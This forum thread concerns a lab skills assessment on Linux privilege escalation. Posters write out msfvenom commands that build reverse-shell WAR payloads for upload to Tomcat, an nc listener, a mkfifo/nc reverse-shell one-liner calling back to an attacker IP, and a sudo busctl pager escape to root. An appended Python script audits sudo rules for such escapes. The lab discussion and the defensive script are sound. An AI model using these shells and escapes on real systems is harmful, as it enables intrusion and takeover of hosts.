Help with Linux Local Privilege Escalation - Skills Assessment

Did you find a way? I had the same issue, so I didn't use this way; I got root in another way, and I already have a fully interactive shell, so I don't think the problem is with my shell.

So please, if anyone has done it this way, can you help me?

I have been stuck on flag 4 for a long time. I am trying to get the root shell by other ways… everybody seems to find the tomcat adm credentials… I have no idea how…

I got the same issue the last few days. I could not get the root after using !/bin/sh. After using !/bin/sh, I still have the uid of tomcat.

Any suggestion would be appreciated.

I finally got it.

I have a Tomcat credential, but I need to find the admin console.

Note if you’re struggling to get a shell as tomcat (flag4)
Once you have the tomcatadm credentials, open up a browser and poke around. You can then pop a reverse shell by uploading a malicious war file.

Can you help me to access the admin console of Tomcat? I have the credential of the tomcatadm user, but the browser doesn't work.

port 8080 is your friend.

OK, thanks,
yesterday I discovered the door. Can you help me to understand where the problem is?

1- Make a Reverse Shell

Now, I have tried to make Reverse Shell with msfvenom

root@htb-xj3iuxvsuy:/tmp# msfvenom -p java/shell/reverse_tcp lhost=10.10.15.181 lport=4444 -f war -o pwn.war

I have found 2 similar payloads and I have tried both with the same error.

payload/java/shell/reverse_tcp
payload/java/shell_reverse_tcp

2 - Start Nc on my Pwnbox

root@htb-xj3iuxvsuy:/tmp# nc -lvnp 4444

3 - On the target, deploy the Pwn.war with the tomcatadm user, then click on the Pwn.war link, but I receive an error.

OK, I solved it. I have read the post of emdeh and I have found the correct payload.

root@htb-xj3iuxvsuy:/tmp/deployer# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.181 LPORT=4444 -f war -o pwn5.war

OK, I have finally completed this challenge.

So, here follows a simple guide to the solution:

  1. Do not run only /usr/bin/busctl; you need to run sudo /usr/bin/busctl
  2. You need to exploit the question the program asks and put the command !/bin/sh at this point; don't simply queue the 2 commands
  WARNING: terminal is not fully functional
  -  (press RETURN)!/bin/sh

For this purpose, the best trick is to spawn a terminal with python3 (it's very simple). When you can enter a command in the reverse shell, type:
python3 -c 'import pty; pty.spawn("/bin/bash")'

and when you have the interactive prompt, run the command with sudo.

If you have difficulties spawning a new shell from the “tomcat_shell”,
you can try to use nc without -e like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.111 9001 >/tmp/f
There are also multiple ways to get a full TTY after that.
From there it is just exploiting the sudo vulnerability with GTFO.
Enjoy
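
Added example, not from any poster in this thread: the root step above works because sudo lets a low-privileged user run busctl, which hands its output to a pager that accepts !/bin/sh. The sketch below audits `sudo -l` output for that kind of rule. It goes beyond busctl with a short, non-exhaustive list of other pager-invoking binaries, and it assumes tags such as NOEXEC lead each entry. The sample listing, user name and host name are constructed.

```python
import re

# Binaries that hand output to a pager (usually less) when run on a TTY.
# busctl is the one from this thread; the rest are an illustrative,
# non-exhaustive assumption.
PAGER_BINARIES = {"busctl", "journalctl", "systemctl", "man", "less"}

# Constructed sample of `sudo -l` output; user and host names are made up.
SAMPLE_SUDO_L = """\
User tomcat may run the following commands on target:
    (root) NOPASSWD: /usr/bin/busctl
    (root) NOEXEC: NOPASSWD: /usr/bin/journalctl -u tomcat9
    (root) /usr/bin/systemctl status tomcat9, /usr/bin/id
"""

ENTRY_RE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")


def audit_sudo_listing(text):
    """Return (command, runas) pairs that can reach a pager shell escape."""
    findings = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # header line or anything that is not a rule entry
        rest, tags = m.group("rest"), set()
        # Peel leading tags such as NOPASSWD: or NOEXEC: off the entry.
        while (t := TAG_RE.match(rest)):
            tags.add(t.group(1))
            rest = rest[t.end():]
        if "NOEXEC" in tags:
            continue  # NOEXEC stops the command from exec'ing a pager or shell
        for cmd in (c.strip() for c in rest.split(",")):
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if binary in PAGER_BINARIES:
                findings.append((cmd, m.group("runas")))
    return findings


if __name__ == "__main__":
    for cmd, runas in audit_sudo_listing(SAMPLE_SUDO_L):
        print(f"[!] {cmd} as {runas}: pager escape possible; add NOEXEC or drop the rule")
```

NOEXEC relies on a preloaded library, so it only constrains dynamically linked binaries; removing the rule or wrapping the command in a fixed script with the pager disabled is the stronger fix.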